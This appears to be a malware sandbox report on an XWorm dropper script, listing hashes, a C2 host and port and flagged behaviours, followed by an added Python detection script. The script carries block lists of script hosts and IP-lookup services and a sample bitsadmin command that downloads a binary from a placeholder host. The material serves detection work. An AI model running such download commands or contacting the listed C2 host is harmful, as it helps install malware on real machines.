General
Target: 023d1fc5d2c9b764979305703c8fe402f8776e073cd739f8b924a3b5a2f6050d
Size: 5KB
Sample: 240830-geqldszhql
MD5: 82d7ae4b17d62b79fcfeb2916d09b295
SHA1: a47bea5ac4dafb57cbf16dcb84e3c2ed01f9199c
SHA256: 023d1fc5d2c9b764979305703c8fe402f8776e073cd739f8b924a3b5a2f6050d
SHA512: de6befa9a4d5e3c0ed71c60b7229955b3e59f6a8367b9f1bd2809192d8689179266ba2b057484e76f9db16bb8cc41554ae9d1db1c2ddd399f36a4cf2fc68e1ce
SSDEEP: 96:y7kkYGfUvclZzbqCnXjjwUNhH44nN8bhgV+tW8S4/bSqtYPmXjCSvI7shhVHfyXH:MNeYxVnXjjwUNhDNWy+tB9bSdPmTCSvY
Static task: static1
Behavioral task: behavioral1
Sample: 8ed7810c7c48d274f4b845cb155ab61af9ac0297fceb2f356ad5557434977b5a.js
Resource: win7-20240729-en
Malware Config
Extracted
Family: xworm
Version: 5.0
C2: yolomesho.work.gd:7000
Mutex: oUFURe5xwVr67Kd5
install_file: USB.exe
Targets
Target: 8ed7810c7c48d274f4b845cb155ab61af9ac0297fceb2f356ad5557434977b5a.js
Size: 441KB
MD5: c7e47553b94c0d18ecf9e03b5ffec68b
SHA1: bfb60db9ad9e0bd41ee2335acaa6316264c0b638
SHA256: 8ed7810c7c48d274f4b845cb155ab61af9ac0297fceb2f356ad5557434977b5a
SHA512: 5a624285b1d9179939495c0f2baa4ecfb7cc9561098977be825ab83b6c90d5e86b4571f5cfa603d9e5e2be76b8e84153a607f26b4263cbff908bb5aca2201194
SSDEEP: 384:JeeeeeeeeeeeRReeeeeeeeeeeReeeeeeeeeeezeeeeeeeeeee8eeeeeeeeeeeRe4:Heo
- Detect Xworm Payload
- Blocklisted process makes network request
- Download via BitsAdmin
- Checks computer location settings: looks up the country code configured in the registry, likely a geofence.
- Looks up external IP address via web service: uses a legitimate IP lookup service to find the infected system's external IP.
- Suspicious use of SetThreadContext (the API call at the heart of process hollowing and other thread-hijacking injection; on its own it is a hint, not proof of injection)
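Detection logic for the behaviours the sandbox flagged above, as an added example that is not part of this report and not any sandbox's own rules. It walks a constructed set of simplified endpoint telemetry records (process start, network connection, registry read, DNS query) and tags each one that matches a signature from the list, plus the C2 host, port and install file from the extracted config. The event schema, the script-host and IP-lookup-service lists, the file paths, the IP addresses and the download URL are assumptions made for illustration, not facts from the report.

```python
"""Added example: tag endpoint telemetry with the behaviours flagged in this
report. Not part of the sandbox report; the event schema, block lists, paths,
IPs and the download URL below are assumptions made for illustration."""
import re
from typing import Iterable

# Values from the extracted XWorm config on this page.
C2_HOST = "yolomesho.work.gd"
C2_PORT = 7000
INSTALL_FILE = "USB.exe"

# Assumed lists (not from the report); extend for your environment.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
IP_LOOKUP_HOSTS = {"api.ipify.org", "ip-api.com", "icanhazip.com",
                   "ifconfig.me", "checkip.amazonaws.com"}
# HKCU\Control Panel\International\Geo\Nation holds the configured country (GeoID).
GEO_NATION_RE = re.compile(r"\\control panel\\international\\geo\\nation$")
# bitsadmin ... /transfer ... <http(s) URL>: the classic LOLBin download.
BITS_DOWNLOAD_RE = re.compile(
    r"\bbitsadmin(?:\.exe)?\b.*?/transfer\b.*?https?://\S+", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: dict) -> list[tuple[str, str]]:
    """Return (signature, detail) pairs triggered by one event."""
    hits = []
    image = _basename(ev.get("image", ""))
    kind = ev["type"]
    if kind == "process":
        cmd = ev.get("cmdline", "")
        if BITS_DOWNLOAD_RE.search(cmd):
            hits.append(("download_via_bitsadmin", cmd))
        if image == INSTALL_FILE.lower():
            hits.append(("xworm_install_file_executed", ev["image"]))
    elif kind == "network":
        host = (ev.get("dest_host") or "").lower()
        dest = f"{host or ev.get('dest_ip')}:{ev['dest_port']}"
        if image in SCRIPT_HOSTS:
            hits.append(("blocklisted_process_network", f"{image} -> {dest}"))
        if host in IP_LOOKUP_HOSTS:
            hits.append(("external_ip_lookup", f"{image} -> {dest}"))
        if host == C2_HOST and ev["dest_port"] == C2_PORT:
            hits.append(("xworm_c2_contact", f"{image} -> {dest}"))
    elif kind == "registry":
        if GEO_NATION_RE.search(ev.get("key", "").lower()):
            hits.append(("geofence_registry_check", f"{image} read {ev['key']}"))
    elif kind == "dns":
        if ev.get("query", "").lower() == C2_HOST:
            hits.append(("xworm_c2_dns", f"{image} resolved {ev['query']}"))
    return hits


def detect(events: Iterable[dict]) -> list[tuple[str, str]]:
    """Run classify() over an event stream, preserving event order."""
    return [hit for ev in events for hit in classify(ev)]


def triggered_signatures(events: Iterable[dict]) -> set[str]:
    """Distinct signature names fired by the stream."""
    return {sig for sig, _ in detect(events)}


# Constructed telemetry, loosely modelled on the behaviours in the report.
# Paths, IPs (TEST-NET ranges) and the download URL are made up.
WSCRIPT = r"C:\Windows\System32\wscript.exe"
DROPPED = r"C:\Users\Public\USB.exe"
SAMPLE_EVENTS = [
    {"type": "process", "image": WSCRIPT, "cmdline":
     r'wscript.exe "C:\Users\victim\Downloads\8ed7810c7c48d274f4b845cb155ab61af9ac0297fceb2f356ad5557434977b5a.js"'},
    {"type": "process", "image": r"C:\Windows\System32\bitsadmin.exe", "cmdline":
     "bitsadmin /transfer job /download /priority high http://example.invalid/x.bin " + DROPPED},
    {"type": "registry", "image": WSCRIPT,
     "key": r"HKCU\Control Panel\International\Geo\Nation"},
    {"type": "network", "image": WSCRIPT, "dest_host": "api.ipify.org",
     "dest_ip": "198.51.100.10", "dest_port": 443},
    {"type": "dns", "image": DROPPED, "query": C2_HOST},
    {"type": "process", "image": DROPPED, "cmdline": "USB.exe"},
    {"type": "network", "image": DROPPED, "dest_host": C2_HOST,
     "dest_ip": "203.0.113.7", "dest_port": C2_PORT},
    {"type": "network", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_host": "www.mozilla.org", "dest_ip": "203.0.113.9", "dest_port": 443},
]

if __name__ == "__main__":
    for sig, detail in detect(SAMPLE_EVENTS):
        print(f"{sig:32} {detail}")
```

The script-host network check fires on any wscript/cscript/mshta connection, which is noisy in environments that legitimately run logon scripts; the config-derived checks (C2 host and port, install file name) are precise but only cover this one sample, so pair both with the geofence and IP-lookup tags rather than alerting on any single one.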